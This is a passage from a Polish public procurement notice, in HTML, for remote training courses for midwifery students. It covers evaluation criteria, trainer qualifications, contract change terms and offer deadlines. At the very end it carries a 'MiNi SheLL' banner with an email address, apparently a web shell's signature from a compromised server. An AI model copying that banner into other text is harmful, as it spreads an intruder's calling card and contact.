class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osób prowadzących szkolenia/staże/warsztaty – w zależności od części zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób niepełnosprawnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> EFEKTYWNA KOMUNIKACJA INTERPERSONALNA <br/>POŁOŻNA- PACJENTKA -RODZINA. <br/>KOMUNIKACJA BUDUJĄCA ZAUFANIE ORAZ POSTAWĘ EMPATYCZNĄ<br/>(Działanie skierowane do studentów kierunku położnictwo)<br/><br/><br/>•	Zasady empatii i interakcji,<br/>•	Komunikowanie terapeutyczne,<br/>•	Najczęstsze błędy w komunikacji i jak ich unikać,<br/>•	Rozmowy na tematy trudne i traumatyczne,<br/>•	Oczekiwania pacjentek oraz ich rodzin w zakresie komunikacji z położną, <br/>•	Techniki radzenia sobie ze stresem,<br/>•	Część praktyczna – scenki<br/>•	Materiały dydaktyczne (w formie elektronicznej)<br/>Niestacjonarnie/Zdalnie<br/>10 studentów<br/>16 godzin lekcyjnych <br/><br/><br/><br/>PROBLEMY ZDROWOTNE KOBIET W WIEKU STARSZYM NA PRZYKŁADZIE PACJENTEK PRZEBYWYWAJĄCYCH W ZAKŁADZIE PIELĘGNACYJNO – OPIEKUŃCZYM<br/>(Działanie skierowane do studentów kierunku położnictwo)<br/><br/><br/><br/>•	Najczęściej występujące problemy zdrowotne u kobiet w wieku starszym przebywających w Zakładzie Pielęgnacyjno - Opiekuńczym.<br/>•	Metody i techniki pielęgnacji dedykowane pacjentkom w Zakładzie Pielęgnacyjno - Opiekuńczym.<br/>•	Sprzęt i materiały wspomagające w pielęgnacji pacjentek starszych w Zakładzie Pielęgnacyjno - Opiekuńczym.<br/>•	Najczęściej występujące powikłania u kobiet starszych przebywających w Zakładzie Pielęgnacyjno - Opiekuńczym.<br/>•	Metody wsparcia i aktywizacji psychospołecznej kobiet starszych przebywających w Zakładzie Pielęgnacyjno - Opiekuńczym.<br/>Niestacjonarnie / Zdalnie<br/>20 studentów<br/>8 godzin lekcyjnych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79000000-4 - Usługi biznesowe: prawnicze, marketingowe, konsultingowe, rekrutacji, drukowania i zabezpieczania</p> <p class="mb-0">79632000-3 - Szkolenie pracowników</p> <p class="mb-0">80510000-2 - Usługi szkolenia specjalistycznego</p> <p class="mb-0">80561000-4 - Usługi szkolenia w dziedzinie zdrowia</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osób prowadzących szkolenia/staże/warsztaty – w zależności od części zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób niepełnosprawnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek zdolności technicznej lub zawodowej;<br/>dla Części 1: Wykonawca musi dysponować wykwalifikowaną kadrą trenerską do przeprowadzenia szkoleń z zakresu symulacji medycznej. Wykonawca musi dysponować co najmniej 4 (czterema) instruktorami/trenerami/szkoleniowcami, posiadającymi kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia, przy czym:Minimum 3 osoby posiadające:1)	Stopień naukowy doktora nauk o zdrowiu lub doktora nauk medycznych.2)	Tytuł zawodowy magistra położnictwa lub pielęgniarstwa lub tytuł zawodowy licencjat ratownictwa medycznego posiadający dodatkowy tytuł zawodowy magistra w innym zakresie.3)	Minimum 5- letnie doświadczenie dydaktyczne w uczelni wyższej kształcącej na kierunku położnictwo i kierunku pielęgniarstwo oraz minimum 5 letnie doświadczenie dydaktyczne w zakresie symulacji medycznej na kierunku położnictwo lub ratownictwo medyczne lub pielęgniarstwo.<br/>Minimum 1 osoba posiadająca:1)Tytuł zawodowy magistra psychologii2)	Tytuł zawodowy magistra położnictwa lub pielęgniarstwa lub tytuł zawodowy licencjat ratownictwa medycznego posiadający dodatkowy tytuł zawodowy magistra w innym zakresie.3)	Minimum 5- letnie doświadczenie dydaktyczne w uczelni wyższej kształcącej na kierunku położnictwo i kierunku pielęgniarstwo oraz minimum 5 letnie doświadczenie dydaktyczne w zakresie symulacji medycznej na kierunku położnictwo lub ratownictwo medyczne lub pielęgniarstwolub: Minimum 1 osoba - Trener symulacji medycznej1)	posiadający wykształcenie wyższe psychologiczne, 2)	będący couchem,posiadający min. 3 letnie doświadczenie w prowadzeniu szkoleń z zakresu wsparcia personelu medycznego oraz wykładowców akademickich we wprowadzaniu metod edukacyjnych symulacji medycznej (wszystkich stopni wierności) w ramach tworzenia i wdrażania centrów symulacji medycznych z zastosowaniem metody dialogu motywującego oraz będącego współautorem min. 6 podręczników symulacji medycznej skierowanych do wykładowców akademickich kształcących na kierunkach medycznych np. pielęgniarstwo.<br/>Część 2: <br/>Wykonawca musi dysponować wykwalifikowaną kadrą trenerską do przeprowadzenia szkoleń z zakresu symulacji medycznej. Wykonawca musi dysponować co najmniej 4 (czterema) instruktorami/trenerami/szkoleniowcami, posiadającymi kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia, przy czym:Minimum 3 osoby posiadające:1)	Stopień naukowy doktora nauk o zdrowiu lub doktora nauk medycznych.2)	Tytuł zawodowy magistra położnictwa lub pielęgniarstwa lub tytuł zawodowy licencjat ratownictwa medycznego posiadający dodatkowy tytuł zawodowy magistra w innym zakresie.3)	Minimum 5- letnie doświadczenie dydaktyczne w uczelni wyższej kształcącej na kierunku położnictwo i kierunku pielęgniarstwo oraz minimum 5 letnie doświadczenie dydaktyczne w zakresie symulacji medycznej na kierunku położnictwo lub ratownictwo medyczne lub pielęgniarstwo.Minimum 1 osoba posiadająca:1)	Tytuł zawodowy magister psychologii2)	Tytuł zawodowy magistra położnictwa lub pielęgniarstwa lub tytuł zawodowy licencjat ratownictwa medycznego posiadający dodatkowy tytuł zawodowy magistra w innym zakresie.3)	Minimum 5- letnie doświadczenie dydaktyczne w uczelni wyższej kształcącej na kierunku położnictwo i kierunku pielęgniarstwo oraz minimum 5 letnie doświadczenie dydaktyczne w zakresie symulacji medycznej na kierunku położnictwo lub ratownictwo medyczne lub pielęgniarstwolub: Minimum 1 osoba - Trener symulacji medycznej1)	posiadający wykształcenie wyższe psychologiczne, 2)	będący couchem,posiadający min. 3 letnie doświadczenie w prowadzeniu szkoleń z zakresu wsparcia personelu medycznego oraz wykładowców akademickich we wprowadzaniu metod edukacyjnych symulacji medycznej (wszystkich stopni wierności) w ramach tworzenia i wdrażania centrów symulacji medycznych z zastosowaniem metody dialogu motywującego oraz będącego współautorem min. 6 podręczników symulacji medycznej skierowanych do wykładowców akademickich kształcących na kierunkach medycznych np. pielęgniarstwo.<br/>Część 3PIERWSZY POZIOM SYMULACJI MEDYCZNYCH W KONTEKŚCIE SYMULACJI NISKIEJ WIERNOŚCI<br/>(Działanie skierowane do studentów kierunku położnictwo)Wykonawca musi dysponować wykwalifikowaną kadrą trenerską do przeprowadzenia szkoleń z zakresu symulacji medycznej. Wykonawca musi dysponować co najmniej 4 (czterema) instruktorami/trenerami/szkoleniowcami, posiadającymi kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia, przy czym:Minimum 3 osoby posiadające:1)	Stopień naukowy doktora nauk o zdrowiu lub doktora nauk medycznych.2)	Tytuł zawodowy magistra położnictwa lub pielęgniarstwa lub tytuł zawodowy licencjat ratownictwa medycznego posiadający dodatkowy tytuł zawodowy magistra w innym zakresie.3)	Minimum 5- letnie doświadczenie dydaktyczne w uczelni wyższej kształcącej na kierunku położnictwo i kierunku pielęgniarstwo oraz minimum 5 letnie doświadczenie dydaktyczne w zakresie symulacji medycznej na kierunku położnictwo lub ratownictwo medyczne lub pielęgniarstwo.Minimum 1 osoba posiadająca:1)	Tytuł zawodowy magistra psychologii2)	Tytuł zawodowy magistra położnictwa lub pielęgniarstwa lub tytuł zawodowy licencjat ratownictwa medycznego posiadający dodatkowy tytuł zawodowy magistra w innym zakresie.3)	Minimum 5- letnie doświadczenie dydaktyczne w uczelni wyższej kształcącej na kierunku położnictwo i kierunku pielęgniarstwo oraz minimum 5 letnie doświadczenie dydaktyczne w zakresie symulacji medycznej na kierunku położnictwo lub ratownictwo medyczne lub pielęgniarstwolub: Minimum 1 osoba - Trener symulacji medycznej1)	posiadający wykształcenie wyższe psychologiczne, 2)	będący couchem,3)	posiadający min. 3 letnie doświadczenie w prowadzeniu szkoleń z zakresu wsparcia personelu medycznego oraz wykładowców akademickich we wprowadzaniu metod edukacyjnych symulacji medycznej (wszystkich stopni wierności) w ramach tworzenia i wdrażania centrów symulacji medycznych z zastosowaniem metody dialogu motywującego oraz będącego współautorem min. 6 podręczników symulacji medycznej skierowanych do wykładowców akademickich kształcących na kierunkach medycznych np. pielęgniarstwo.DRUGI POZIOM SYMULACJI MEDYCZNYCH W KONTEKŚCIE SYMULACJI POŚREDNIEJ WIERNOŚCI(Działanie skierowane do studentów kierunku położnictwo)<br/>Wykonawca musi dysponować wykwalifikowaną kadrą trenerską do przeprowadzenia szkoleń z zakresu symulacji medycznej. Wykonawca musi dysponować co najmniej 4 (czterema) instruktorami/trenerami/szkoleniowcami, posiadającymi kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia, przy czym:Minimum 3 osoby posiadające:1)Stopień naukowy doktora nauk o zdrowiu lub doktora nauk medycznych.2)	Tytuł zawodowy magistra położnictwa lub pielęgniarstwa lub tytuł zawodowy licencjat ratownictwa medycznego posiadający dodatkowy tytuł zawodowy magistra w innym zakresie.3)	Minimum 5- letnie doświadczenie dydaktyczne w uczelni wyższej kształcącej na kierunku położnictwo i kierunku pielęgniarstwo oraz minimum 5 letnie doświadczenie dydaktyczne w zakresie symulacji medycznej na kierunku położnictwo lub ratownictwo medyczne lub pielęgniarstwo.Minimum 1 osoba posiadająca:1)	Tytuł zawodowy magistra psychologii2)	Tytuł zawodowy magistra położnictwa lub pielęgniarstwa lub tytuł zawodowy licencjat ratownictwa medycznego posiadający dodatkowy tytuł zawodowy magistra w innym zakresie.3)	Minimum 5- letnie doświadczenie dydaktyczne w uczelni wyższej kształcącej na kierunku położnictwo i kierunku pielęgniarstwo oraz minimum 5 letnie doświadczenie dydaktyczne w zakresie symulacji medycznej na kierunku położnictwo lub ratownictwo medyczne lub pielęgniarstwolub: Minimum 1 osoba - Trener symulacji medycznej1)posiadający wykształcenie wyższe psychologiczne, 2)	będący couchem,3)posiadający min. 3 letnie doświadczenie w prowadzeniu szkoleń z zakresu wsparcia personelu medycznego oraz wykładowców akademickich we wprowadzaniu metod edukacyjnych symulacji medycznej (wszystkich stopni wierności) w ramach tworzenia i wdrażania centrów symulacji medycznych z zastosowaniem metody dialogu motywującego oraz będącego współautorem min. 6 podręczników symulacji medycznej skierowanych do wykładowców akademickich kształcących na kierunkach medycznych np. pielęgniarstwo.TRZECI POZIOM SYMULACJI MEDYCZNYCH W KONTEKŚCIE SYMULACJI WYSOKIEJ WIERNOŚCI(Działanie skierowane do studentów kierunkupołożnictwo)Wykonawca musi dysponować wykwalifikowaną kadrą trenerską do przeprowadzenia szkoleń z zakresu symulacji medycznej. Wykonawca musi dysponować co najmniej 4 (czterema) instruktorami/trenerami/szkoleniowcami, posiadającymi kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia, przy czym:Minimum 3 osoby posiadające:1)Ciąg dalszy - sekcja IX <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia Załącznik nr 8 do SWZ, wraz z ofertą;<br/>W przypadku złożenia oferty wspólnej Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>2) Oferta wspólna musi spełniać wymagania: oświadczenie o niepoleganiu wykluczeniu (Załącznik nr 2 do SWZ) składa: - każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia (na oddzielnym formularzu) lub - pełnomocnik (umocowany do składania oświadczeń woli) w imieniu każdego z wykonawców osobno. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany i uzupełnienia treści niniejszej umowy mogą być dokonane za zgodą obu stron, wyrażone na piśmie w formie pisemnego aneksu podpisanego przez strony pod rygorem nieważności.<br/>2.	Zamawiający dopuszcza zmiany umowy w przypadkach określonych w art. 455 ust. 1 i 2 ustawy Prawo Zamówień Publicznych oraz przewiduje możliwość dokonania w umowie następujących istotnych zmian:<br/>1)	wynagrodzenia w przypadku ustawowej zmiany wysokości podatku VAT,<br/>2)	Zamawiający ma prawo zmienić formę prowadzenia zajęć z formy stacjonarnej na zdalną lub wrócić z formy zdalnej na formę stacjonarną prowadzenia zajęć w przypadku rozwoju pandemii Covid-19, <br/>3)	wynagrodzenia w przypadku zmniejszenia ilości uczestników/godzin przed przystąpieniem do szkolenia/stażu/warsztatów, wynagrodzenie zostanie pomniejszone o koszt jednego uczestnika/jednej godziny określony w formularzu ofertowym Wykonawcy (zmniejszenie nie będzie przekraczać 50 % przedmiotu zamówienia),<br/>4)	zmiany osobowej prowadzącego przedmiot zamówienia, o ile osoba zastępująca spełnia wszystkie warunki postawione w postępowaniu oraz Wykonawca uzyska zgodę na tą zmianę od Zamawiającego – w tym przypadku Strony nie podpisują aneksu,<br/>5)	zmiany w przypadku zmiany danych podmiotowych Wykonawcy,<br/>6)	gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym, a inną niż Wykonawca stroną, w szczególności Instytucją Pośredniczącą, a także innymi instytucjami oraz zmian wprowadzonych do wniosku o dofinansowanie projektu, które na podstawie przepisów prawa mogą wpływać na realizację zamówienia, <br/>7)	gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej, w szczególności w zakresie sprawozdawczości, <br/>8)	terminu wykonania przedmiotu umowy w przypadku:<br/>a)	wcześniejszego wykonania przedmiotu umowy,<br/>b)	wydłużenia czasu trwania projektu,<br/>c)	rozwoju pandemii Covid – 19,<br/>d)	wydłużeniem terminu wykonania umowy w związku z dostosowaniem harmonogramu realizacji przedmiotu umowy do potrzeb Zamawiającego,<br/>e)	dostosowania harmonogramu realizacji przedmiotu umowy do potrzeb Zamawiającego,<br/>f)	zaistnienia działań wojennych, aktów terroryzmu, rewolucji, pandemii, przewrotu wojskowego lub cywilnego, wojny domowej, buntów, niepokojów, strajków, skażeń radioaktywnych, z wyjątkiem tych, które mogą być spowodowane użyciem ich przez Wykonawcę,<br/>g)	zaistnienia klęski żywiołowej, jak huragany, powodzie, trzęsienie ziemi. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/mazowiecka w myśl Ustawy na stronie internetowej prowadzonego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-16 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Stopień naukowy doktora nauk o zdrowiu lub doktora nauk medycznych.2)	Tytuł zawodowy magistra położnictwa lub pielęgniarstwa lub tytuł zawodowy licencjat ratownictwa medycznego posiadający dodatkowy tytuł zawodowy magistra w innym zakresie.3)	Minimum 5- letnie doświadczenie dydaktyczne w uczelni wyższej kształcącej na kierunku położnictwo i kierunku pielęgniarstwo oraz minimum 5 letnie doświadczenie dydaktyczne w zakresie symulacji medycznej na kierunku położnictwo lub ratownictwo medyczne lub pielęgniarstwo.Minimum 1 osoba posiadająca:1)	Tytuł zawodowy magistra psychologii2)	Tytuł zawodowy magistra położnictwa lub pielęgniarstwa lub tytuł zawodowy licencjat ratownictwa medycznego posiadający dodatkowy tytuł zawodowy magistra w innym zakresie.3)	Minimum 5- letnie doświadczenie dydaktyczne w uczelni wyższej kształcącej na kierunku położnictwo i kierunku pielęgniarstwo oraz minimum 5 letnie doświadczenie dydaktyczne w zakresie symulacji medycznej na kierunku położnictwo lubratownictwo medyczne lub pielęgniarstwolub: Minimum 1 osoba - Trener symulacji medycznej1)	posiadający wykształcenie wyższe psychologiczne, 2)	będący couchem,posiadający min. 3 letnie doświadczenie w prowadzeniu szkoleń z zakresu wsparcia personelu medycznego oraz wykładowców akademickich we wprowadzaniu metod edukacyjnych symulacji medycznej (wszystkich stopni wierności) w ramach tworzenia i wdrażania centrów symulacji medycznych z zastosowaniem metody dialogu motywującego oraz będącego współautorem min. 6 podręczników symulacji medycznej skierowanych do wykładowców akademickich kształcących na kierunkach medycznych np. pielęgniarstwo.Część 4: EFEKTYWNA KOMUNIKACJA INTERPERSONALNA POŁOŻNA- PACJENTKA -RODZINA. KOMUNIKACJA BUDUJĄCA ZAUFANIE ORAZ POSTAWĘ EMPATYCZNĄ(Działanie skierowane do studentów kierunku położnictwo)Wykonawca musi dysponować minimum jednym instruktorem/trenerem/szkoleniowcem posiadającym:1)	Tytuł zawodowy magister psychologii2)	Tytuł zawodowy magistra położnictwa lub pielęgniarstwa lub tytuł zawodowy licencjat ratownictwa medycznego posiadający dodatkowy tytuł zawodowy magistra w innym zakresie.3)	Minimum 5- letnie doświadczenie dydaktyczne w uczelni wyższej kształcącej na kierunku położnictwo i kierunku pielęgniarstwo oraz minimum 5 letnie doświadczenie dydaktyczne w zakresie symulacji medycznej na kierunku położnictwo lub ratownictwo medyczne. PROBLEMY ZDROWOTNE KOBIET W WIEKU STARSZYM NA PRZYKŁADZIE PACJENTEK PRZEBYWYWAJĄCYCH W ZAKŁADZIE PIELĘGNACYJNO – OPIEKUŃCZYM(Działanie skierowane do studentów kierunku położnictwo)Wykonawca musi dysponować minimum jednym instruktorem/trenerem/szkoleniowcem posiadającym:1)	Tytuł zawodowy magistra położnictwa lub pielęgniarstwa lub tytuł zawodowy licencjat ratownictwa medycznego posiadający dodatkowy tytuł zawodowy magistra w innym zakresie.2)	Minimum 5- letnie doświadczenie dydaktyczne w uczelni wyższej kształcącej na kierunku położnictwo i kierunku pielęgniarstwo oraz minimum 5 letnie doświadczenie dydaktyczne w zakresie symulacji medycznej na kierunku położnictwo lub ratownictwo medyczne.<br/><br/>Zamawiający wykluczy z postępowania Wykonawcę w stosunku do którego zachodzą okoliczności wskazane w art. 7 ust. 1ustawy z dnia ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniuagresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (przesłanka obligatoryjna) zgodnie z zapisami SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com